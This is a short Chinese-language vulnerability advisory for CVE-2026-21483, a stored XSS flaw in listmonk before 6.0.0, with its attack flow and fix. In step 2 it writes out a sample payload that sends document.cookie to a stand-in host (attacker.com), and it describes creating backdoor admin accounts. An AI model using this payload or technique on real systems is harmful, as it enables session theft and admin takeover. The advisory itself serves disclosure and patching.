CVE-2026-21483listmonk是一款独立的自托管新闻通讯和邮件列表管理器。该漏洞影响6.0.0之前的所有版本。漏洞允许拥有campaign管理权限的低权限用户在campaigns或templates中注入恶意JavaScript代码。当高权限用户(如Super Admin)查看或预览这些内容时,XSS payload会在其浏览器上下文中执行。攻击者可以利用此漏洞执行特权操作,例如创建后门管理员账户,从而完全控制系统。更危险的是,该漏洞可以通过公共存档功能进行武器化,攻击者只需构造恶意链接并诱导受害者访问,无需受害者点击任何预览按钮即可触发XSS攻击。这使得该漏洞具有极高的实际威胁性,因为攻击可以大规模自动化实施。
该漏洞为存储型XSS(Stored XSS),攻击流程如下:1)攻击者(低权限用户)登录listmonk并获得campaign管理权限;2)攻击者在创建或编辑campaign/template时,在内容字段中注入恶意JavaScript代码,如<script>fetch('attacker.com/steal?cookie='+document.cookie)</script>;3)由于系统未对用户输入进行充分的HTML转义,恶意代码被存储在数据库中;4)当高权限用户(Super Admin)访问该campaign进行查看或预览时,服务器从数据库取出未经过滤的内容并返回给用户浏览器;5)浏览器将恶意代码作为合法脚本执行,从而在受害者会话中执行任意操作;6)攻击者可通过JavaScript API创建新管理员账户或窃取会话cookie。修复方案为在6.0.0版本中对所有用户输入进行严格的HTML实体转义,并添加Content-Security-Policy头部防护。